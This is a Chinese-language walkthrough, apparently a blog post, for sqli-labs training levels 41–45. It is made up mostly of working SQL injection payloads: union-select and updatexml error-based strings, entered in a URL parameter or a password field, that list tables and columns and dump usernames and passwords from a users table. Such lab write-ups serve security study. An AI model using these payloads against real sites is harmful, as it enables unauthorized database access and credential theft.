sqli-labs靶场通关攻略 41-45

主页有sqli-labs靶场通关攻略 1-40

第四一关 less-41

步骤一:查询闭合方式

?id=1 --+

步骤二:查询数据库

?id=-1 union select 1,2,database()--+

步骤三:查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

步骤四:查看users表列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤五:查看users表信息

?id=-1 union select 1,2,group_concat(id,username,password) from users --+

第四二关 less-42

步骤一:登录页面

步骤二:查询数据库

密码框输入:'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_sche ma.columns where table_name='users' ),0x7e),1) -- aaa

第四三关 less-43

步骤一:登录页面

步骤二:查询数据库

密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

第四四关 less-44

步骤一:登录页面

步骤二:查询数据库

密码框输入:1' union select 1,database(),3 #

步骤三:查看表名

密码框输入:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

步骤四:查看users表列名

密码框输入:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

步骤五:查看表中信息

1' union select 1,group_concat(username,password),3 from users #

第四五关 less-45

步骤一:登录页面

步骤二:查询数据库

密码框输入:1') union select 1,database(),3 #

步骤三:查看表名

密码框输入:1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

步骤四:查看users表列名

密码框输入:1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

相关推荐
一枚正在学习的小白9 分钟前
PG数据文件位置迁移
linux·运维·服务器·数据库
真的想不出名儿26 分钟前
上传头像到腾讯云对象存储-前端基于antdv
java·数据库·腾讯云
Dreams_l36 分钟前
初识redis(分布式系统, redis的特性, 基本命令)
数据库·redis·缓存
数据库知识分享者小北37 分钟前
Qoder + ADB Supabase :5分钟GET超火AI手办生图APP
数据库·后端
点亮一颗LED(从入门到放弃)1 小时前
SQLite3数据库——Linux应用
linux·数据库·sqlite
济南java开发,求内推2 小时前
mongodb一个服务器部署多个节点
服务器·数据库·mongodb
武子康2 小时前
Java-148 深入浅出 MongoDB 聚合操作:$match、$group、$project、$sort 全面解析 Pipeline 实例详解与性能优化
java·数据库·sql·mongodb·性能优化·系统架构·nosql
程序猿(雷霆之王)2 小时前
MySQL——复合查询
数据库·mysql
IT 小阿姨(数据库)3 小时前
PostgreSQL etcd 集群介绍
运维·数据库·sql·postgresql·centos·etcd
NPE~3 小时前
[手写系列]Go手写db — — 第五版(实现数据库操作模块)
开发语言·数据库·后端·golang·教程·手写系列·手写数据库